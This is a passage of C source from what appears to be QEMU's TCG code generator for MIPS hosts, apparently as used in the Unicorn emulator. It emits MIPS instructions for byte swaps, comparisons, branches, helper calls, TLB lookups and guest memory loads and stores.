tcg_out_bswap16s(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); tcg_out_opc_reg(s, OPC_SEH, ret, 0, ret); } else { /* ret and arg can't be register at */ if (ret == TCG_TMP0 || arg == TCG_TMP0) { tcg_abort(); } tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); tcg_out_opc_sa(s, OPC_SRA, ret, ret, 16); tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); } } static void tcg_out_bswap_subr(TCGContext *s, tcg_insn_unit *sub) { bool ok = tcg_out_opc_jmp(s, OPC_JAL, sub); tcg_debug_assert(ok); } static void tcg_out_bswap32(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); tcg_out_opc_sa(s, OPC_ROTR, ret, ret, 16); } else { tcg_out_bswap_subr(s, bswap32_addr); /* delay slot -- never omit the insn, like tcg_out_mov might. */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP0, arg, TCG_REG_ZERO); tcg_out_mov(s, TCG_TYPE_I32, ret, TCG_TMP3); } } static void tcg_out_bswap32u(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_DSBH, ret, 0, arg); tcg_out_opc_reg(s, OPC_DSHD, ret, 0, ret); tcg_out_dsrl(s, ret, ret, 32); } else { tcg_out_bswap_subr(s, bswap32u_addr); /* delay slot -- never omit the insn, like tcg_out_mov might. */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP0, arg, TCG_REG_ZERO); tcg_out_mov(s, TCG_TYPE_I32, ret, TCG_TMP3); } } static void tcg_out_bswap64(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_DSBH, ret, 0, arg); tcg_out_opc_reg(s, OPC_DSHD, ret, 0, ret); } else { tcg_out_bswap_subr(s, bswap64_addr); /* delay slot -- never omit the insn, like tcg_out_mov might. */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP0, arg, TCG_REG_ZERO); tcg_out_mov(s, TCG_TYPE_I32, ret, TCG_TMP3); } } static inline void tcg_out_ext8s(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_SEB, ret, 0, arg); } else { tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); tcg_out_opc_sa(s, OPC_SRA, ret, ret, 24); } } static inline void tcg_out_ext16s(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_reg(s, OPC_SEH, ret, 0, arg); } else { tcg_out_opc_sa(s, OPC_SLL, ret, arg, 16); tcg_out_opc_sa(s, OPC_SRA, ret, ret, 16); } } static inline void tcg_out_ext32u(TCGContext *s, TCGReg ret, TCGReg arg) { if (use_mips32r2_instructions) { tcg_out_opc_bf(s, OPC_DEXT, ret, arg, 31, 0); } else { tcg_out_dsll(s, ret, arg, 32); tcg_out_dsrl(s, ret, ret, 32); } } static void tcg_out_ldst(TCGContext *s, MIPSInsn opc, TCGReg data, TCGReg addr, intptr_t ofs) { int16_t lo = ofs; if (ofs != lo) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_TMP0, ofs - lo); if (addr != TCG_REG_ZERO) { tcg_out_opc_reg(s, ALIAS_PADD, TCG_TMP0, TCG_TMP0, addr); } addr = TCG_TMP0; } tcg_out_opc_imm(s, opc, data, addr, lo); } static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { MIPSInsn opc = OPC_LD; if (TCG_TARGET_REG_BITS == 32 || type == TCG_TYPE_I32) { opc = OPC_LW; } tcg_out_ldst(s, opc, arg, arg1, arg2); } static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { MIPSInsn opc = OPC_SD; if (TCG_TARGET_REG_BITS == 32 || type == TCG_TYPE_I32) { opc = OPC_SW; } tcg_out_ldst(s, opc, arg, arg1, arg2); } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { if (val == 0) { tcg_out_st(s, type, TCG_REG_ZERO, base, ofs); return true; } return false; } static void tcg_out_addsub2(TCGContext *s, TCGReg rl, TCGReg rh, TCGReg al, TCGReg ah, TCGArg bl, TCGArg bh, bool cbl, bool cbh, bool is_sub) { TCGReg th = TCG_TMP1; /* If we have a negative constant such that negating it would make the high part zero, we can (usually) eliminate one insn. */ if (cbl && cbh && bh == -1 && bl != 0) { bl = -bl; bh = 0; is_sub = !is_sub; } /* By operating on the high part first, we get to use the final carry operation to move back from the temporary. */ if (!cbh) { tcg_out_opc_reg(s, (is_sub ? OPC_SUBU : OPC_ADDU), th, ah, bh); } else if (bh != 0 || ah == rl) { tcg_out_opc_imm(s, OPC_ADDIU, th, ah, (is_sub ? -bh : bh)); } else { th = ah; } /* Note that tcg optimization should eliminate the bl == 0 case. */ if (is_sub) { if (cbl) { tcg_out_opc_imm(s, OPC_SLTIU, TCG_TMP0, al, bl); tcg_out_opc_imm(s, OPC_ADDIU, rl, al, -bl); } else { tcg_out_opc_reg(s, OPC_SLTU, TCG_TMP0, al, bl); tcg_out_opc_reg(s, OPC_SUBU, rl, al, bl); } tcg_out_opc_reg(s, OPC_SUBU, rh, th, TCG_TMP0); } else { if (cbl) { tcg_out_opc_imm(s, OPC_ADDIU, rl, al, bl); tcg_out_opc_imm(s, OPC_SLTIU, TCG_TMP0, rl, bl); } else if (rl == al && rl == bl) { tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, al, TCG_TARGET_REG_BITS - 1); tcg_out_opc_reg(s, OPC_ADDU, rl, al, bl); } else { tcg_out_opc_reg(s, OPC_ADDU, rl, al, bl); tcg_out_opc_reg(s, OPC_SLTU, TCG_TMP0, rl, (rl == bl ? al : bl)); } tcg_out_opc_reg(s, OPC_ADDU, rh, th, TCG_TMP0); } } /* Bit 0 set if inversion required; bit 1 set if swapping required. */ #define MIPS_CMP_INV 1 #define MIPS_CMP_SWAP 2 static const uint8_t mips_cmp_map[16] = { [TCG_COND_LT] = 0, [TCG_COND_LTU] = 0, [TCG_COND_GE] = MIPS_CMP_INV, [TCG_COND_GEU] = MIPS_CMP_INV, [TCG_COND_LE] = MIPS_CMP_INV | MIPS_CMP_SWAP, [TCG_COND_LEU] = MIPS_CMP_INV | MIPS_CMP_SWAP, [TCG_COND_GT] = MIPS_CMP_SWAP, [TCG_COND_GTU] = MIPS_CMP_SWAP, }; static void tcg_out_setcond(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg arg1, TCGReg arg2) { MIPSInsn s_opc = OPC_SLTU; int cmp_map; switch (cond) { case TCG_COND_EQ: if (arg2 != 0) { tcg_out_opc_reg(s, OPC_XOR, ret, arg1, arg2); arg1 = ret; } tcg_out_opc_imm(s, OPC_SLTIU, ret, arg1, 1); break; case TCG_COND_NE: if (arg2 != 0) { tcg_out_opc_reg(s, OPC_XOR, ret, arg1, arg2); arg1 = ret; } tcg_out_opc_reg(s, OPC_SLTU, ret, TCG_REG_ZERO, arg1); break; case TCG_COND_LT: case TCG_COND_GE: case TCG_COND_LE: case TCG_COND_GT: s_opc = OPC_SLT; /* FALLTHRU */ case TCG_COND_LTU: case TCG_COND_GEU: case TCG_COND_LEU: case TCG_COND_GTU: cmp_map = mips_cmp_map[cond]; if (cmp_map & MIPS_CMP_SWAP) { TCGReg t = arg1; arg1 = arg2; arg2 = t; } tcg_out_opc_reg(s, s_opc, ret, arg1, arg2); if (cmp_map & MIPS_CMP_INV) { tcg_out_opc_imm(s, OPC_XORI, ret, ret, 1); } break; default: tcg_abort(); break; } } static void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGReg arg1, TCGReg arg2, TCGLabel *l) { static const MIPSInsn b_zero[16] = { [TCG_COND_LT] = OPC_BLTZ, [TCG_COND_GT] = OPC_BGTZ, [TCG_COND_LE] = OPC_BLEZ, [TCG_COND_GE] = OPC_BGEZ, }; MIPSInsn s_opc = OPC_SLTU; MIPSInsn b_opc; int cmp_map; switch (cond) { case TCG_COND_EQ: b_opc = OPC_BEQ; break; case TCG_COND_NE: b_opc = OPC_BNE; break; case TCG_COND_LT: case TCG_COND_GT: case TCG_COND_LE: case TCG_COND_GE: if (arg2 == 0) { b_opc = b_zero[cond]; arg2 = arg1; arg1 = 0; break; } s_opc = OPC_SLT; /* FALLTHRU */ case TCG_COND_LTU: case TCG_COND_GTU: case TCG_COND_LEU: case TCG_COND_GEU: cmp_map = mips_cmp_map[cond]; if (cmp_map & MIPS_CMP_SWAP) { TCGReg t = arg1; arg1 = arg2; arg2 = t; } tcg_out_opc_reg(s, s_opc, TCG_TMP0, arg1, arg2); b_opc = (cmp_map & MIPS_CMP_INV ? OPC_BEQ : OPC_BNE); arg1 = TCG_TMP0; arg2 = TCG_REG_ZERO; break; default: tcg_abort(); break; } tcg_out_opc_br(s, b_opc, arg1, arg2); if (l->has_value) { reloc_pc16(s->code_ptr - 1, l->u.value_ptr); } else { tcg_out_reloc(s, s->code_ptr - 1, R_MIPS_PC16, l, 0); } tcg_out_nop(s); } static TCGReg tcg_out_reduce_eq2(TCGContext *s, TCGReg tmp0, TCGReg tmp1, TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh) { /* Merge highpart comparison into AH. */ if (bh != 0) { if (ah != 0) { tcg_out_opc_reg(s, OPC_XOR, tmp0, ah, bh); ah = tmp0; } else { ah = bh; } } /* Merge lowpart comparison into AL. */ if (bl != 0) { if (al != 0) { tcg_out_opc_reg(s, OPC_XOR, tmp1, al, bl); al = tmp1; } else { al = bl; } } /* Merge high and low part comparisons into AL. */ if (ah != 0) { if (al != 0) { tcg_out_opc_reg(s, OPC_OR, tmp0, ah, al); al = tmp0; } else { al = ah; } } return al; } static void tcg_out_setcond2(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh) { TCGReg tmp0 = TCG_TMP0; TCGReg tmp1 = ret; tcg_debug_assert(ret != TCG_TMP0); if (ret == ah || ret == bh) { tcg_debug_assert(ret != TCG_TMP1); tmp1 = TCG_TMP1; } switch (cond) { case TCG_COND_EQ: case TCG_COND_NE: tmp1 = tcg_out_reduce_eq2(s, tmp0, tmp1, al, ah, bl, bh); tcg_out_setcond(s, cond, ret, tmp1, TCG_REG_ZERO); break; default: tcg_out_setcond(s, TCG_COND_EQ, tmp0, ah, bh); tcg_out_setcond(s, tcg_unsigned_cond(cond), tmp1, al, bl); tcg_out_opc_reg(s, OPC_AND, tmp1, tmp1, tmp0); tcg_out_setcond(s, tcg_high_cond(cond), tmp0, ah, bh); tcg_out_opc_reg(s, OPC_OR, ret, tmp1, tmp0); break; } } static void tcg_out_brcond2(TCGContext *s, TCGCond cond, TCGReg al, TCGReg ah, TCGReg bl, TCGReg bh, TCGLabel *l) { TCGCond b_cond = TCG_COND_NE; TCGReg tmp = TCG_TMP1; /* With branches, we emit between 4 and 9 insns with 2 or 3 branches. With setcond, we emit between 3 and 10 insns and only 1 branch, which ought to get better branch prediction. */ switch (cond) { case TCG_COND_EQ: case TCG_COND_NE: b_cond = cond; tmp = tcg_out_reduce_eq2(s, TCG_TMP0, TCG_TMP1, al, ah, bl, bh); break; default: /* Minimize code size by preferring a compare not requiring INV. */ if (mips_cmp_map[cond] & MIPS_CMP_INV) { cond = tcg_invert_cond(cond); b_cond = TCG_COND_EQ; } tcg_out_setcond2(s, cond, tmp, al, ah, bl, bh); break; } tcg_out_brcond(s, b_cond, tmp, TCG_REG_ZERO, l); } static void tcg_out_movcond(TCGContext *s, TCGCond cond, TCGReg ret, TCGReg c1, TCGReg c2, TCGReg v1, TCGReg v2) { bool eqz = false; /* If one of the values is zero, put it last to match SEL*Z instructions */ if (use_mips32r6_instructions && v1 == 0) { v1 = v2; v2 = 0; cond = tcg_invert_cond(cond); } switch (cond) { case TCG_COND_EQ: eqz = true; /* FALLTHRU */ case TCG_COND_NE: if (c2 != 0) { tcg_out_opc_reg(s, OPC_XOR, TCG_TMP0, c1, c2); c1 = TCG_TMP0; } break; default: /* Minimize code size by preferring a compare not requiring INV. */ if (mips_cmp_map[cond] & MIPS_CMP_INV) { cond = tcg_invert_cond(cond); eqz = true; } tcg_out_setcond(s, cond, TCG_TMP0, c1, c2); c1 = TCG_TMP0; break; } if (use_mips32r6_instructions) { MIPSInsn m_opc_t = eqz ? OPC_SELEQZ : OPC_SELNEZ; MIPSInsn m_opc_f = eqz ? OPC_SELNEZ : OPC_SELEQZ; if (v2 != 0) { tcg_out_opc_reg(s, m_opc_f, TCG_TMP1, v2, c1); } tcg_out_opc_reg(s, m_opc_t, ret, v1, c1); if (v2 != 0) { tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP1); } } else { MIPSInsn m_opc = eqz ? OPC_MOVZ : OPC_MOVN; tcg_out_opc_reg(s, m_opc, ret, v1, c1); /* This should be guaranteed via constraints */ tcg_debug_assert(v2 == ret); } } static void tcg_out_call_int(TCGContext *s, tcg_insn_unit *arg, bool tail) { /* Note that the ABI requires the called function's address to be loaded into T9, even if a direct branch is in range. */ tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_T9, (uintptr_t)arg); /* But do try a direct branch, allowing the cpu better insn prefetch. */ if (tail) { if (!tcg_out_opc_jmp(s, OPC_J, arg)) { tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_T9, 0); } } else { if (!tcg_out_opc_jmp(s, OPC_JAL, arg)) { tcg_out_opc_reg(s, OPC_JALR, TCG_REG_RA, TCG_REG_T9, 0); } } } static void tcg_out_call(TCGContext *s, tcg_insn_unit *arg) { tcg_out_call_int(s, arg, false); tcg_out_nop(s); } #if defined(CONFIG_SOFTMMU) #include "../tcg-ldst.inc.c" static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_SB] = helper_ret_ldsb_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LESW] = helper_le_ldsw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BESW] = helper_be_ldsw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, #if TCG_TARGET_REG_BITS == 64 [MO_LESL] = helper_le_ldsl_mmu, [MO_BESL] = helper_be_ldsl_mmu, #endif }; static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; /* Helper routines for marshalling helper function arguments into * the correct registers and stack. * I is where we want to put this argument, and is updated and returned * for the next call. ARG is the argument itself. * * We provide routines for arguments which are: immediate, 32 bit * value in register, 16 and 8 bit values in register (which must be zero * extended before use) and 64 bit value in a lo:hi register pair. */ static int tcg_out_call_iarg_reg(TCGContext *s, int i, TCGReg arg) { if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { tcg_out_mov(s, TCG_TYPE_REG, tcg_target_call_iarg_regs[i], arg); } else { /* For N32 and N64, the initial offset is different. But there we also have 8 argument register so we don't run out here. */ tcg_debug_assert(TCG_TARGET_REG_BITS == 32); tcg_out_st(s, TCG_TYPE_REG, arg, TCG_REG_SP, 4 * i); } return i + 1; } static int tcg_out_call_iarg_reg8(TCGContext *s, int i, TCGReg arg) { TCGReg tmp = TCG_TMP0; if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { tmp = tcg_target_call_iarg_regs[i]; } tcg_out_opc_imm(s, OPC_ANDI, tmp, arg, 0xff); return tcg_out_call_iarg_reg(s, i, tmp); } static int tcg_out_call_iarg_reg16(TCGContext *s, int i, TCGReg arg) { TCGReg tmp = TCG_TMP0; if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { tmp = tcg_target_call_iarg_regs[i]; } tcg_out_opc_imm(s, OPC_ANDI, tmp, arg, 0xffff); return tcg_out_call_iarg_reg(s, i, tmp); } static int tcg_out_call_iarg_imm(TCGContext *s, int i, TCGArg arg) { TCGReg tmp = TCG_TMP0; if (arg == 0) { tmp = TCG_REG_ZERO; } else { if (i < ARRAY_SIZE(tcg_target_call_iarg_regs)) { tmp = tcg_target_call_iarg_regs[i]; } tcg_out_movi(s, TCG_TYPE_REG, tmp, arg); } return tcg_out_call_iarg_reg(s, i, tmp); } static int tcg_out_call_iarg_reg2(TCGContext *s, int i, TCGReg al, TCGReg ah) { tcg_debug_assert(TCG_TARGET_REG_BITS == 32); i = (i + 1) & ~1; i = tcg_out_call_iarg_reg(s, i, (MIPS_BE ? ah : al)); i = tcg_out_call_iarg_reg(s, i, (MIPS_BE ? al : ah)); return i; } /* We expect to use a 16-bit negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -32768); /* * Perform the tlb comparison operation. * The complete host address is placed in BASE. * Clobbers TMP0, TMP1, TMP2, TMP3. */ static void tcg_out_tlb_load(TCGContext *s, TCGReg base, TCGReg addrl, TCGReg addrh, TCGMemOpIdx oi, tcg_insn_unit *label_ptr[2], bool is_load) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif MemOp opc = get_memop(oi); unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); int mem_index = get_mmuidx(oi); int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); int add_off = offsetof(CPUTLBEntry, addend); int cmp_off = (is_load ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); target_ulong mask; /* Load tlb_mask[mmu_idx] and tlb_table[mmu_idx]. */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP0, TCG_AREG0, mask_off); tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP1, TCG_AREG0, table_off); /* Extract the TLB index from the address into TMP3. */ tcg_out_opc_sa(s, ALIAS_TSRL, TCG_TMP3, addrl, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); tcg_out_opc_reg(s, OPC_AND, TCG_TMP3, TCG_TMP3, TCG_TMP0); /* Add the tlb_table pointer, creating the CPUTLBEntry address in TMP3. */ tcg_out_opc_reg(s, ALIAS_PADD, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* We don't currently support unaligned accesses. We could do so with mips32r6. */ if (a_bits < s_bits) { a_bits = s_bits; } /* Mask the page bits, keeping the alignment bits to compare against. */ mask = (target_ulong)TARGET_PAGE_MASK | ((1 << a_bits) - 1); /* Load the (low-half) tlb comparator. */ if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_out_ld(s, TCG_TYPE_I32, TCG_TMP0, TCG_TMP3, cmp_off + LO_OFF); tcg_out_movi(s, TCG_TYPE_I32, TCG_TMP1, mask); } else { tcg_out_ldst(s, (TARGET_LONG_BITS == 64 ? OPC_LD : TCG_TARGET_REG_BITS == 64 ? OPC_LWU : OPC_LW), TCG_TMP0, TCG_TMP3, cmp_off); tcg_out_movi(s, TCG_TYPE_TL, TCG_TMP1, mask); /* No second compare is required here; load the tlb addend for the fast path. */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP2, TCG_TMP3, add_off); } tcg_out_opc_reg(s, OPC_AND, TCG_TMP1, TCG_TMP1, addrl); /* Zero extend a 32-bit guest address for a 64-bit host. */ if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addrl); addrl = base; } label_ptr[0] = s->code_ptr; tcg_out_opc_br(s, OPC_BNE, TCG_TMP1, TCG_TMP0); /* Load and test the high half tlb comparator. */ if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { /* delay slot */ tcg_out_ld(s, TCG_TYPE_I32, TCG_TMP0, TCG_TMP3, cmp_off + HI_OFF); /* Load the tlb addend for the fast path. */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_TMP2, TCG_TMP3, add_off); label_ptr[1] = s->code_ptr; tcg_out_opc_br(s, OPC_BNE, addrh, TCG_TMP0); } /* delay slot */ tcg_out_opc_reg(s, ALIAS_PADD, base, TCG_TMP2, addrl); } static void add_qemu_ldst_label(TCGContext *s, int is_ld, TCGMemOpIdx oi, TCGType ext, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addrhi, void *raddr, tcg_insn_unit *label_ptr[2]) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->type = ext; label->datalo_reg = datalo; label->datahi_reg = datahi; label->addrlo_reg = addrlo; label->addrhi_reg = addrhi; label->raddr = raddr; label->label_ptr[0] = label_ptr[0]; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { label->label_ptr[1] = label_ptr[1]; } } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); TCGReg v0; int i; /* resolve label address */ reloc_pc16(l->label_ptr[0], s->code_ptr); if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { reloc_pc16(l->label_ptr[1], s->code_ptr); } i = 1; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { i = tcg_out_call_iarg_reg2(s, i, l->addrlo_reg, l->addrhi_reg); } else { i = tcg_out_call_iarg_reg(s, i, l->addrlo_reg); } i = tcg_out_call_iarg_imm(s, i, oi); i = tcg_out_call_iarg_imm(s, i, (intptr_t)l->raddr); tcg_out_call_int(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SSIZE)], false); /* delay slot */ tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); v0 = l->datalo_reg; if (TCG_TARGET_REG_BITS == 32 && (opc & MO_SIZE) == MO_64) { /* We eliminated V0 from the possible output registers, so it cannot be clobbered here. So we must move V1 first. */ if (MIPS_BE) { tcg_out_mov(s, TCG_TYPE_I32, v0, TCG_REG_V1); v0 = l->datahi_reg; } else { tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_V1); } } tcg_out_opc_br(s, OPC_BEQ, TCG_REG_ZERO, TCG_REG_ZERO); reloc_pc16(s->code_ptr - 1, l->raddr); /* delay slot */ if (TCG_TARGET_REG_BITS == 64 && l->type == TCG_TYPE_I32) { /* we always sign-extend 32-bit loads */ tcg_out_opc_sa(s, OPC_SLL, v0, TCG_REG_V0, 0); } else { tcg_out_opc_reg(s, OPC_OR, v0, TCG_REG_V0, TCG_REG_ZERO); } return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); MemOp s_bits = opc & MO_SIZE; int i; /* resolve label address */ reloc_pc16(l->label_ptr[0], s->code_ptr); if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { reloc_pc16(l->label_ptr[1], s->code_ptr); } i = 1; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { i = tcg_out_call_iarg_reg2(s, i, l->addrlo_reg, l->addrhi_reg); } else { i = tcg_out_call_iarg_reg(s, i, l->addrlo_reg); } switch (s_bits) { case MO_8: i = tcg_out_call_iarg_reg8(s, i, l->datalo_reg); break; case MO_16: i = tcg_out_call_iarg_reg16(s, i, l->datalo_reg); break; case MO_32: i = tcg_out_call_iarg_reg(s, i, l->datalo_reg); break; case MO_64: if (TCG_TARGET_REG_BITS == 32) { i = tcg_out_call_iarg_reg2(s, i, l->datalo_reg, l->datahi_reg); } else { i = tcg_out_call_iarg_reg(s, i, l->datalo_reg); } break; default: tcg_abort(); } i = tcg_out_call_iarg_imm(s, i, oi); /* Tail call to the store helper. Thus force the return address computation to take place in the return address register. */ tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_RA, (intptr_t)l->raddr); i = tcg_out_call_iarg_reg(s, i, TCG_REG_RA); tcg_out_call_int(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)], true); /* delay slot */ tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); return true; } #endif static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg lo, TCGReg hi, TCGReg base, MemOp opc, bool is_64) { switch (opc & (MO_SSIZE | MO_BSWAP)) { case MO_UB: tcg_out_opc_imm(s, OPC_LBU, lo, base, 0); break; case MO_SB: tcg_out_opc_imm(s, OPC_LB, lo, base, 0); break; case MO_UW | MO_BSWAP: tcg_out_opc_imm(s, OPC_LHU, TCG_TMP1, base, 0); tcg_out_bswap16(s, lo, TCG_TMP1); break; case MO_UW: tcg_out_opc_imm(s, OPC_LHU, lo, base, 0); break; case MO_SW | MO_BSWAP: tcg_out_opc_imm(s, OPC_LHU, TCG_TMP1, base, 0); tcg_out_bswap16s(s, lo, TCG_TMP1); break; case MO_SW: tcg_out_opc_imm(s, OPC_LH, lo, base, 0); break; case MO_UL | MO_BSWAP: if (TCG_TARGET_REG_BITS == 64 && is_64) { if (use_mips32r2_instructions) { tcg_out_opc_imm(s, OPC_LWU, lo, base, 0); tcg_out_bswap32u(s, lo, lo); } else { tcg_out_bswap_subr(s, bswap32u_addr); /* delay slot */ tcg_out_opc_imm(s, OPC_LWU, TCG_TMP0, base, 0); tcg_out_mov(s, TCG_TYPE_I64, lo, TCG_TMP3); } break; } /* FALLTHRU */ case MO_SL | MO_BSWAP: if (use_mips32r2_instructions) { tcg_out_opc_imm(s, OPC_LW, lo, base, 0); tcg_out_bswap32(s, lo, lo); } else { tcg_out_bswap_subr(s, bswap32_addr); /* delay slot */ tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, base, 0); tcg_out_mov(s, TCG_TYPE_I32, lo, TCG_TMP3); } break; case MO_UL: if (TCG_TARGET_REG_BITS == 64 && is_64) { tcg_out_opc_imm(s, OPC_LWU, lo, base, 0); break; } /* FALLTHRU */ case MO_SL: tcg_out_opc_imm(s, OPC_LW, lo, base, 0); break; case MO_Q | MO_BSWAP: if (TCG_TARGET_REG_BITS == 64) { if (use_mips32r2_instructions) { tcg_out_opc_imm(s, OPC_LD, lo, base, 0); tcg_out_bswap64(s, lo, lo); } else { tcg_out_bswap_subr(s, bswap64_addr); /* delay slot */ tcg_out_opc_imm(s, OPC_LD, TCG_TMP0, base, 0); tcg_out_mov(s, TCG_TYPE_I64, lo, TCG_TMP3); } } else if (use_mips32r2_instructions) { tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, base, 0); tcg_out_opc_imm(s, OPC_LW, TCG_TMP1, base, 4); tcg_out_opc_reg(s, OPC_WSBH, TCG_TMP0, 0, TCG_TMP0); tcg_out_opc_reg(s, OPC_WSBH, TCG_TMP1, 0, TCG_TMP1); tcg_out_opc_sa(s, OPC_ROTR, MIPS_BE ? lo : hi, TCG_TMP0, 16); tcg_out_opc_sa(s, OPC_ROTR, MIPS_BE ? hi : lo, TCG_TMP1, 16); } else { tcg_out_bswap_subr(s, bswap32_addr); /* delay slot */ tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, base, 0); tcg_out_opc_imm(s, OPC_LW, TCG_TMP0, base, 4); tcg_out_bswap_subr(s, bswap32_addr); /* delay slot */ tcg_out_mov(s, TCG_TYPE_I32, MIPS_BE ? lo : hi, TCG_TMP3); tcg_out_mov(s, TCG_TYPE_I32, MIPS_BE ? hi : lo, TCG_TMP3); } break; case MO_Q: /* Prefer to load from offset 0 first, but allow for overlap. */ if (TCG_TARGET_REG_BITS == 64) { tcg_out_opc_imm(s, OPC_LD, lo, base, 0); } else if (MIPS_BE ? hi != base : lo == base) { tcg_out_opc_imm(s, OPC_LW, hi, base, HI_OFF); tcg_out_opc_imm(s, OPC_LW, lo, base, LO_OFF); } else { tcg_out_opc_imm(s, OPC_LW, lo, base, LO_OFF); tcg_out_opc_imm(s, OPC_LW, hi, base, HI_OFF); } break; default: tcg_abort(); } } static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg addr_regl, addr_regh __attribute__((unused)); TCGReg data_regl, data_regh; TCGMemOpIdx oi; MemOp opc; #if defined(CONFIG_SOFTMMU) tcg_insn_unit *label_ptr[2]; #endif TCGReg base = TCG_REG_A0; data_regl = *args++; data_regh = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addr_regl = *args++; addr_regh = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); #if defined(CONFIG_SOFTMMU) tcg_out_tlb_load(s, base, addr_regl, addr_regh, oi, label_ptr, 1); tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc, is_64); add_qemu_ldst_label(s, 1, oi, (is_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), data_regl, data_regh, addr_regl, addr_regh, s->code_ptr, label_ptr); #else if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addr_regl); addr_regl = base; } if (guest_base == 0 && data_regl != addr_regl) { base = addr_regl; } else if (guest_base == (int16_t)guest_base) { tcg_out_opc_imm(s, ALIAS_PADDI, base, addr_regl, guest_base); } else { tcg_out_opc_reg(s, ALIAS_PADD, base, TCG_GUEST_BASE_REG, addr_regl); } 